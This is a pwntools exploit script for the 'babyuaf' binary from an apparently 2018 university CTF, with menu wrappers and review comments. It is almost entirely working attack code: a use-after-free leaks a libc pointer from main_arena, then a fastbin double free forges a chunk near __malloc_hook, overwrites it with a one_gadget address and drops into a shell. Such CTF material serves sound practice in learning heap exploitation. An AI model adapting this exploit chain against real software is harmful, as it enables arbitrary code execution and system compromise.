# Exploit script for the "babyuaf" CTF binary (heap use-after-free / double free).
# NOTE(review): str/bytes concatenation on the leak line and the str payloads
# indicate Python 2 pwntools — confirm the interpreter before running.
from pwn import *
context.terminal=["terminator", "-e"]
p = process('./babyuaf')
e = ELF('./babyuaf')  # loaded but not referenced later in this script
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Offset of main_arena inside the author's local libc (name is a typo of "main_arena").
# Together with one_gadget below it is tied to that specific libc build and is not portable.
main_arana_offset = 0x3c4b20
free_hook_offset = libc.symbols['__free_hook']
one_gadget = [0x45226,0x4527a,0xf0364,0xf1207] # ldd local libc

# Menu wrappers: each drives one option of the target's text menu through the
# global process handle `p`. Menu number / prompt strings are taken from the binary.
def add_info(name, age, comment):
    """Menu 1: create an info entry (name, age, comment)."""
    p.sendlineafter('> ', "1")
    p.sendafter('name : ', name)
    p.sendafter('age : ', str(age))
    p.sendafter('comment : ', comment)

def delete_info(index):
    """Menu 2: free the info entry at `index` (0~4)."""
    p.sendlineafter('> ', "2")
    p.sendlineafter('(0~4) : ', str(index))

def view_info(index):
    """Menu 3: print the info entry at `index` (0~4)."""
    p.sendlineafter('> ', "3")
    p.sendlineafter('(0~4) : ', str(index))

def add_memo(size, memo):
    """Menu 4: allocate a memo of `size` bytes and fill it with `memo`."""
    p.sendlineafter('> ', "4")
    p.sendafter('size : ', str(size))
    p.sendafter('memo : ', memo)

def delete_memo(index):
    """Menu 5: free the memo at `index` (0~4)."""
    p.sendlineafter('> ', "5")
    p.sendlineafter('(0~4) : ', str(index))

#uaf
add_info("A"*0x18, "100", "B"*0x10) # unsorted bin chunk
add_memo(16, "C"*8)
delete_info(0)
add_info("D"*8, "200", "E"*8)
view_info(0)
#main_arena+88 leak
# Read past the 8 "D" bytes, then take the 6 bytes up to and including the 0x7f
# high byte of the leaked pointer and zero-extend to 8 bytes.
p.recvuntil('DDDDDDDD')
leak = u64(p.recvuntil("\x7f")[-6:] + "\x00\x00")
# libc_leak
libc_leak = leak - 88 - main_arana_offset
free_hook = libc_leak + free_hook_offset  # computed and logged only; not used below
malloc_hook = libc_leak + libc.symbols['__malloc_hook']
one_shot = libc_leak + one_gadget[3]
log.info('main_arena+88 leak : {}'.format(hex(leak)))
log.info('libc_leak : {}'.format(hex(libc_leak)))
log.info('free_hook : {}'.format(hex(free_hook)))
# Using the double free ("DFG" in the original) a value can be written to a chosen location.
add_memo(89, "a"*8) # size 89 chosen so the chunk lands in the 0x7f size range.
add_memo(89, "b"*8)
delete_info(0)
delete_memo(1)
delete_memo(2)
delete_memo(1)
# Using the double free, create a fake chunk at malloc_hook-35 (0x7f).
add_memo(89, p64(malloc_hook-35))
add_memo(89, "c"*8)
add_memo(89, "d"*8)
add_memo(89, "e"*19+p64(one_shot)+p64(0)*20) # overwrite malloc_hook with the one_shot gadget!
#after > -> choose 1 -> malloc -> __malloc_hook(one_shot) -> shell!
p.interactive()
2018 아주대 사이버보안학과 ctf - babyuaf
Binary
Mitigation
Exploit